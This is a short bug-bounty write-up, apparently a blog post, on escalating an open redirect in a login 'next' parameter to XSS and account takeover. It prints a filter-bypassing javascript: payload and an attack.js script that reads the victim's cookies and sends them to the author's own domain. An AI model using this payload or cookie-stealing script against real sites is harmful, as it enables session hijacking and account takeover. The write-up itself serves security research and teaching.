Open-redirect to Account Takeover.

Rishabh
May 19 · 2 min read
We will lead to here later.

Hi everyone, this is my first writeup, about my first bug, and I want to share how I escalated an open redirect to account takeover. Let’s go.

https://victim.com/login/?next=/page/

This is the URL which redirects to the given page after login, but the issue was that if I passed https://google.com to the next parameter it redirected to google.com, which is an external site.

After reading more than 15 reports about open redirects, I learned that what you can do with this vulnerability is redirect the user to your own domain and then prompt for sensitive information, for which the manipulated URL looks something like this:

https://victim.com/login/?next=https://your_domain.com

But I did not report it that way. Instead I thought, why not try something else, like a different scheme (javascript:)? Luckily there were no filters for that, so the vulnerability escalated from a phishing attack to XSS. After that I made a nice POC that steals the cookies of the current user who opens the manipulated URL.

Problems I faced while making the POC:

  1. Double quotes, single quotes, and parentheses were not allowed. [I used the backtick (`) instead.]

?next= javascript:$.getScript`https://my_own_domain/attack.js`

attack.js

// The same script runs in two places: on the victim page (loaded via the
// javascript: redirect) and on my own domain (loaded from attacker.html).
if (location.host == "my_own_domain") {
    // On my domain: read the cookie value out of the query string and display it
    var url = new URL(document.location);
    var parameters = new URLSearchParams(url.search); // original referenced an undefined "x"
    var cookie = parameters.get("cookie");
    document.write(cookie);
} else {
    // On the victim page: send the current user's cookies to my domain
    var cookie = document.cookie;
    document.location = "https://my_own_domain/attacker.html?cookie=" + cookie;
}

Takeaways

  1. Always try something different. I even tried for XSS directly (?next=<script>alert(1)</script>); sometimes it works out and sometimes it does not, but in both cases you gain experience and familiarity with the concept.

Final Payload

https://victim.com/?next= javascript:$.getScript`https://my_own_domain/attack.js`

My Twitter ==> ME

Thanks a lot for reading. Until next time.